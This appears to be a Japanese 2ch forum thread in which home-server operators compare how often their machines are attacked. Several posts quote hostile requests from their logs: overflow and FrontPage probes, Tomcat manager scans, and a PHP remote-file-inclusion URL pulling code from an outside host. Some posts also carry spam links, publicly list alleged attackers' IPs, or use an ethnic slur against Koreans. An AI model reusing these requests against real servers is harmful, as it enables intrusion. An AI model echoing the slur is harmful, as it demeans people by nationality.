自宅鯖に攻撃された回数

1 ：03/04/29 ～最終レス：10/05/23: 漏れはアタックされたことないが
ウィルスを入れられたことはある
ドレぐらいあるか、話し合いましょう～

2 ：: 2GET
3 ：: ＞ウィルスを入れられたことはある
ケーブル引っこ抜いて(ry
アタックの有無は自宅鯖に関係なく発生する。
セキュ板にいってくれ
削除依頼するのを忘れるなよ
4 ：: ここと重複っぽい
http://pc2.2ch.net/test/read.cgi/mysv/1044692135/
5 ：: おまいは今までに喰ったパンの数を覚えて（ry
6 ：: 「<ヽ｀∀´>」からミサイルが飛んできますた。
7 ：: >>6
ワラタ
8 ：: http://www10.plala.or.jp/the-vsop1985/
短パンは食べたよ
9 ：: 毎日1000～1300回アタックされてるｙｐ
10 ：: 同じプロバイダかもしれないが、Coderedが…ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ
11 ：: 10
12 ：: >>10
うちは平和だよ。
http://www.gamiras.com/cgi-bin/apache_attack.cgi
13 ：: そんなことより>>8よ、
くったことあるか？
14 ：: >>12
何でそんなに少ないんですか？
15 ：: >>14
日頃の行いだと思いたい。
#Nimdaがまったくないのは不自然だなぁと思うんですが、
#まったく同じスクリプトを仕込んだ取引先の鯖群はヒットしまくってるし・・・
16 ：: ？
17 ：: おすすめサイト一覧です☆
http://accessplus.jp/staff/in.cgi?id=10645
http://www.39001.com/cgi-bin/cpc/gateway.cgi?id=neat
http://www.39001.com/cgi-bin/cpc/welcome.cgi?id=neat
http://www.emzshop.com/goodstyle/
http://neturl.nu/okane
18 ：: >>16
私怨？
19 ：: 80あけときゃアタックされ放題。
漏れも♀にアタックされてぇよ！
20 ：: ━―━―━―━―━―━―━―━―━[JR山崎駅（＾＾）]━―━―━―━―━―━―━―━―━―
21 ：: 　　　　∧＿∧
ﾋﾟｭ.ｰ　(　　＾＾）＜これからも僕を応援して下さいね（＾＾）。
　　＝〔~∪￣￣〕
　　＝ ◎――◎ 　　　　　　　　　　　　　　　　　　　　　山崎渉
22 ：: 複数の男に侵入されたんだとさ
1 名前：ひろゆき ◆3SHRUNYAXA ＠どうやら管理人 ★ 投稿日：03/06/27 06:51
6･27日夜、某Z社のドアでドーンと大きな音がし複数の男性が浸入してきて、某Z社にたいして２ちゃんねるの掲示板の削除を怒声で要求したそうです。
某Z社は他の社員さんもおり、社員さんの安全のために要求にしたがわざるを得なかったそうです。
とはいえ、２ちゃんねるとしては、そういった行為で掲示板を閉鎖するのはよしとしませんので再開することにしました。
しかしながら、某Z社さんに迷惑がかかるといけないので、某Z社の人が一切サーバに入れないようにすべての権限を剥奪しパスワードを変えました。
某Z社に迷惑がかかるので、今回の件について某Z社の方に連絡するのはくれぐれもお控えください。。。と。
レンサバ板休止の真相
http://pc2.2ch.net/test/read.cgi/hosting/1056664280/
23 ：: ☆可愛い娘満載のＨサイト☆（閲覧無料）
http://endou.kir.jp/yuminet/link.html
24 ：: よろしく！！
http://www1.free-city.net/home/kotarou/page006.html
25 ：: >>15
> #Nimdaがまったくないのは不自然だなぁと思うんですが、
apache_attack.cgi の 79行目。
if ( &ap_og("default.ida") ) { &at_print_day; }
を、
if ( &ap_og("default\.ida") ) { &at_print_day; }
もしくは、
if ( &ap_og("\Qdefault.ida\E") ) { &at_print_day; }
にしておくと安心するかと思われ（ｗ
26 ：: 自鯖が攻撃された事はあるが、
自鯖に攻撃された事はない。
27 ：: 　__∧＿∧_
　|（　　＾＾）|　＜寝るぽ（＾＾）
　|＼⌒⌒⌒＼
　＼ |⌒⌒⌒~|　　　　　　　　　山崎渉
　　 ~￣￣￣￣
28 ：: 　　　　∧＿∧　 ∧＿∧
ﾋﾟｭ.ｰ　（　・３・） (　　＾＾）＜これからも僕たちを応援して下さいね（＾＾）。
　　＝〔~∪￣￣￣∪￣￣〕
　　＝ ◎――――――◎ 　　　　　　　　　　　　　　　　　　　　　山崎渉&ぼるじょあ
29 ：: 　　　 (⌒V⌒)
　　　│ ＾＾ │＜これからも僕を応援して下さいね（＾＾）。
　　⊂|　　　　|つ
　　　（＿）（＿）　　　　　　　　　　　　　　　　　　　　　　山崎パン

30 ：: ポート135ｺﾅｲ… (´･ω･`)
31 ：: う
32 ：: ん
33 ：: ん
34 ：: こ
35 ：: く
36 ：: い
37 ：: た
38 ：: い
39 ：: に
40 ：: ょ
41 ：: め
42 ：: か
43 ：: ら
44 ：: び
45 ：: ー
46 ：: む
47 ：: し
48 ：: 数える気にもならん…
49 ：: り
50 ：: 今頃、CodeRedとか、Nimdaに感染されてることを想定して、
アタックしてくるヤツがいるんだけど。
そいつら、時代遅れ？
51 ：: 自宅鯖のログに、こんなのが。
$ grep "Invalid user" $LOG |cat -n |tail -n1
43 Oct DD HH:MM:SS SERVER sshd[NUM]: Invalid user test from 211.192.229.4
そっちを適当につついて見たが、サーバソフトが軒並2年前のバージョンで、
当然脆弱性てんこ漏り...
要するに、此奴、踏台になってる模様。
52 ：: >>50
まあ、時代遅れといえばそうなんだろうな。
おまえさんのサイトが脆弱そうだから攻撃してるんじゃなくて、そいつらのサイトが脆弱なだけだと思うけど。
53 ：: >>51
バージョンが古いからってセキュリティホールが残っているものだと考えるのは
厨だぞ。パッケージ製品ならともかく、オープンソースならパッチをバックポート
して適用する場合もあるわけだし。
54 ：: >>53
もう少し説明したい。
まず、縁のゆかりもない俺の自宅鯖に、一分程の間に43回、複数の名前
(test, jane, webmaster, mysql他いろいろ)でsshしてきた経緯がわからない。
こっちは人にアカウントあげた覚えはない。
くだんのIPを自分でつつけば分かるが、サーバソフト(proftpd, apache, php)の
バージョンが揃って2002年前半のそれだった(もちろん、返す値が真実と
かけはなれてる可能性は当然ある)。
# 流石に当該サイトの脆弱性検証まではやってないので(立派なクラックじゃん)
そこのftpdにアクセスすると、あるドメインが表示されたので、ぐぐってみると
すぐ近くのIPを持つ韓国語のサイトに出た。
こっちはさらに酷かった。
ネームサーバがたってたのでdigで試すと、関係ないドメインまで検索してくれた。
(そんなの、プロバイダが顧客向けにやれば十分だと思うが...)
6000まで開いていた。インターネット越しにX動かす神経が信じられない。
(単に気づかないだけなら、さらに救いがたい)
ちなみに使ってるサーバのバージョンは同一だった。
これだけの事実を見ると、管理者の勘違いOR悪戯というより、そのシステムを
乗っ取った小僧の可能性を疑いたくなる。
# 他に勘違いしてる可能性があったら教えてくれ。
55 ：: Oct 22 15:02:11 SERVER postfix/smtpd[1227]: connect from unknown
  [221.140.55.88]
Oct 22 15:02:12 SERVER postfix/smtpd[1227]: NOQUEUE: reject: RCPT
  from unknown[221.140.55.88]: 554 <moneyhunter99@daum.net>: Relay
  access denied; from=<ddhe2oo9uuhh44tyqg2@yahoo.com.au>
  to=<moneyhunter99@daum.net> proto=SMTP helo=<none>
Oct 22 15:02:12 SERVER postfix/smtpd[1227]: disconnect from unknown
  [221.140.55.88]
スパマー大っ嫌い。
56 ：: inetnum: 219.0.0.0 - 219.63.255.255
netname: BBTECH
descr: SOFTBANK BB CORP
descr: Nation wide network in Japan
country: JP
admin-c: SA127-AP
tech-c: SA127-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-JP-BBTECH
changed: hostmaster@apnic.net 20011031
changed: hm-changed@apnic.net 20030616
status: ALLOCATED PORTABLE
source: APNIC
57 ：: 携帯のIPで朝から140件ほど攻撃を受けてる
58 ：: KRNIC is not a ISP but a National Internet Registry similar to APNIC.
The address is allocated yet
Please contact following ISP for further information
[ ISP Organization Information ]
Org Name : NIDA
Service Name : KRNIC-NET
Org Address : Seocho 2-dong Seocho-gu SEOUL
Org Detail Address: 1321-11 11th KTF B/D
[ ISP IP Admin Contact Information ]
Name : IP Adm
Phone : +82-2-2186-4500
E-Mail : noc@nida.or.kr
[ ISP IP Tech Contact Information ]
Name : IP Tech
Phone : +82-2-2186-4500
E-mail : noc@nida.or.kr
[ ISP Network Abuse Contact Information ]
Name : Abuse Manager
Phone : +82-2-2186-4500
E-mail : noc@nida.or.kr
- NIDA/KRNIC Whois Service -
こいつ（202.30.50.120）がこの2時間で100回ぐらい仕掛けてきてる。
まじでﾁｮﾝ。
59 ：: 機能サーバーで足の小指打った。

60 ：: ↓こんなのが1回
GET /w00tw00t.at.ISC.SANS.DFind:)
↓こんなのが週数回
SEARCH /\x90\xc9\(略)\x90\
POST /_vti_bin/_vti_aut/fp30reg.dll
61 ：: >>1
ネットに一時間つなげば、一回や二回あってもおかしくない。
普通は数え切れないはず。
62 ：: 自分が管理しているサーバーに攻撃されたのか？
なんか凶暴なサーバーなんだねw
63 ：: 面白い事書こうと必死杉
頭ﾜﾙｿｰ
64 ：: うちのおかんから攻撃がありました！
かーちゃん……電源ぬくなよ
65 ：: おかん最強のクラッカー
66 ：: 一人暮らしすればいい話だが
67 ：: ちょっと穴空けて、踏み台にされるのを待っているんだけど・・・
ツールとかドサッと置いたのを確認してから、いただいちゃおうって考えね。
68 ：: >>67
それ何ていう死亡フラグ？
69 ：: 最近、8080ポート空けてると毎日
GET /manager/html
ってのがやたら来るんだけど、何がしたいのやら
70 ：: /脆弱性が見つかってるphp?http://URL
みたいなのが土曜からずっと来てるのだけど。
エージェントはlibwww-perlやMorfeus Fucking Scanner
ディレクトリやPHP名はかわっていってるけど、自分の鯖はPHP導入してないんだよね
検索で探せばPHP使ってるサイト等結構みつかるのに、そんな確認もせずに総スキャンかましてるのか
2-3回アクセス毎にIP変わってるのでiptablesの制限にかからないけど、PHPを使ってない鯖にいつまで続けるんだろ
71 ：: 読み直してみたら70の日本語が変だorz
72 ：: 認証とか面倒なんでポート全解放管理者パスワード無し
最近不安定でexploler.exeが起動しないからアップデートもしてない
でもアタックなんてされるわけないから大丈夫
73 ：: サーバーにハッキングしようとする悪質な輩を晒し上げ
Failed logins from:
58.229.117.54: 3201 times
122.209.225.187: 26 times
125.54.44.56 (KD125054044056.ppp-bb.dion.ne.jp): 1 time

Illegal users from:
58.229.117.54: 2864 times
122.209.225.187: 1 time
Failed logins from:
128.134.180.202: 38 times
202.108.201.158: 22 times
213.194.149.28 (ns4.hostinglmi.net): 30 times
218.12.196.5: 5 times
222.73.225.84: 124 times

Illegal users from:
128.134.180.202: 174 times
202.108.201.158: 31 times
213.194.149.28 (ns4.hostinglmi.net): 1043 times
218.12.196.5: 4 times
222.73.225.84: 144 times
74 ：: >>73
とりあえずチョンは弾けよ
75 ：: サーバーにハッキングしようとする悪質な輩を晒し上げ
Failed logins from:
70.86.87.58 (3a.57.5646.static.theplanet.com): 573 times
88.191.78.192 (sd-13533.dedibox.fr): 312 times

Illegal users from:
88.191.78.192 (sd-13533.dedibox.fr): 5 times
76 ：: 運用が安定してからsshの不正ログインチャレンジは毎日200はあったな
sshdのポートを変えたらゼロになった
77 ：: サーバーにハッキングしようとする悪質な輩を晒し上げ
毎日こんな調子だわ orz
Failed logins from:
74.52.28.122 (7a.1c.344a.static.theplanet.com): 13 times
80.232.45.118: 523 times
81.86.39.135 (81-86-39-135.dsl.pipex.com): 2 times
83.16.138.122 (afi122.internetdsl.tpnet.pl): 6 times
207.58.135.82 (pi.com): 114 times

Illegal users from:
74.52.28.122 (7a.1c.344a.static.theplanet.com): 2 times
80.232.45.118: 1608 times
81.86.39.135 (81-86-39-135.dsl.pipex.com): 1 time
83.16.138.122 (afi122.internetdsl.tpnet.pl): 788 times
207.58.135.82 (pi.com): 2030 times
78 ：: 俺実際にルータの設定いじられたことあるｗ
知らない間にポート全部開いてたｗ
アタック通知設定にすべきだな
79 ：: 怖えええええええｗｗ
80 ：: >>78
それはルータとサーバのどっちの設定に問題があったんだ？
81 ：: 最近
/send_reminders.php?includedir=http://www.*.de/2007/pics/id.txt???
みたいなのが毎日数時間置きぐらいにきてるけど、他の人はどう?
とりあえずユーザーエージェントとしてとして残ってるlibwww-perlをDROPしたから403を返してるけど、それでもずーとアクセスあるのよね
php使ってないのにさ
IPも次から次へと変えてるっぽい
82 ：: >81
ぐぐるぐらい自分でやれ。
http://www.securityfocus.com/bid/14651
83 ：: >>82
いや、この手のアクセスが毎日数時間おきに来てるって事が言いたかったわけです
他の人はどうかなっと
84 ：: じさばは、大切なファイルのあるPCと同じラン上にあるんですか？
85 ：: いつも使ってるPCで自鯖運営すると結構便利
攻撃されたらすぐLANケーブル抜くことができるし。
86 ：: それは降伏では・・・
87 ：: 鯖がよく落ちるなと思って、今日セキュリティログ見てみたら30171番ポートにボットネットから攻撃されてやがった。
どうすればいいものか。
88 ：: つ iptables
つ ipfilter
つ ipfw
つ PeerGuardian
89 ：: つ [めるこ]
つ [これが]
90 ：: つ［pci］
つ［WinME］
91 ：: >>69
　Tomcatの管理用コンテキストにアクセスできてしまうことがある。
　ほとんどの場合、Basic認証付きがデフォルトだから、大丈夫。
92 ：10/05/23: 65.74.168.210 (c1resolver1.ctmail.com)
最近やたら多いんだけど
カードの情報盗まれた可能性もあるので警察に届けた方がいいかしら？